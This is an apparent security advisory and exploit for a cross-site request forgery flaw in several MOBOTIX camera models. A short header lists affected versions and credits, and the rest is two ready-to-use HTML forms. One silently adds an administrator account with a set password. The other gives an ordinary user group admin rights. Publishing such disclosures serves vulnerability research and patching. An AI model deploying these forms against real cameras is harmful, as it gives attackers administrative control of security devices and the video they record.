MOBOTIX Video Security Cameras Cross Site Request Forgery

`<!--  
  
  
MOBOTIX Video Security Cameras CSRF Add Admin Exploit  
  
  
Vendor: MOBOTIX AG  
Product web page: https://www.mobotix.com  
Affected version: [Model]: D22M-Secure, [HW]: T2r1.1.AA, 520 MHz, 128 MByte RAM, [SW]: MX-V3.5.2.23.r3  
[Model]: Q24M-Secure, [HW]: T2r3.1, 806 MHz, [SW]: MX-V4.1.10.28  
[Model]: D14D-Secure, [HW]: T2r4.2b, 806 MHz, 256 MByte RAM, [SW]: MX-V4.1.4.70  
[Model]: M15D-Secure, [HW]: T3r4.4, 806 MHz, [SW]: MX-V4.3.4.50  
  
Summary: MOBOTIX is a German System Manufacturer of Professional Video  
Management (VMS) and Smart IP Cameras. These cameras support all standard  
features of MOBOTIX IP cameras like automatic object detection, messaging  
via network and onboard or network recording. The dual lens thermal system  
supports additionally a second optical video sensor with 6-megapixel resolution.  
  
Desc: The application interface allows users to perform certain actions via  
HTTP requests without performing any validity checks to verify the requests.  
This can be exploited to perform certain actions with administrative privileges  
if a logged-in user visits a malicious web site.  
  
Tested on: Linux 2.6.37.6+  
thttpd/2.19-MX  
  
  
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
@zeroscience  
  
  
Advisory ID: ZSL-2016-5312  
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5312.php  
  
  
25.02.2016  
  
-->  
  
  
  
Add admin user Testingus:  
-------------------------  
  
<html>  
<body>  
<form action="http://10.0.0.17/admin/access" method="POST">  
<input type="hidden" name="user_name_0" value="admin" />  
<input type="hidden" name="user_group_0" value="admins" />  
<input type="hidden" name="user_passwd_a_0" value="***" />  
<input type="hidden" name="user_passwd_b_0" value="***" />  
<input type="hidden" name="user_name_2" value="Testingus" />  
<input type="hidden" name="user_group_1" value="admins" />  
<input type="hidden" name="user_passwd_a_2" value="l33tp4ss" />  
<input type="hidden" name="user_passwd_b_2" value="l33tp4ss" />  
<input type="hidden" name="sv_passwd_a" value="" />  
<input type="hidden" name="sv_passwd_b" value="" />  
<input type="hidden" name="super_pin_1" value="" />  
<input type="hidden" name="super_pin_2" value="" />  
<input type="hidden" name="save_config" value="Set" />  
<input type="submit" value="Submit" />  
</form>  
</body>  
</html>  
  
  
Add group 'users' to admin area:  
--------------------------------  
  
<html>  
<body>  
<form action="http://10.0.0.17/admin/acl" method="POST">  
<input type="hidden" name="group_allow_guest_global" value="on" />  
<input type="hidden" name="group_allow_live_global" value="on" />  
<input type="hidden" name="group_allow_player_global" value="on" />  
<input type="hidden" name="group_allow_multiview_global" value="on" />  
<input type="hidden" name="group_allow_pda_global" value="on" />  
<input type="hidden" name="group_allow_mxcc_global" value="on" />  
<input type="hidden" name="group_allow_info_global" value="on" />  
<input type="hidden" name="group_allow_imagelink_global" value="on" />  
<input type="hidden" name="group_allow_api_global" value="on" />  
<input type="hidden" name="group_allow_image_setup_0" value="on" />  
<input type="hidden" name="group_allow_event_setup_0" value="on" />  
<input type="hidden" name="group_name_1" value="guests" />  
<input type="hidden" name="group_name_2" value="users" />  
<input type="hidden" name="group_allow_admin_2" value="on" />  
<input type="hidden" name="group_allow_image_setup_2" value="on" />  
<input type="hidden" name="group_allow_event_setup_2" value="on" />  
<input type="hidden" name="new_group" value="" />  
<input type="hidden" name="save_config" value="Set" />  
<input type="hidden" name="more_or_less" value="less" />  
<input type="submit" value="Submit" />  
</form>  
</body>  
</html>  
`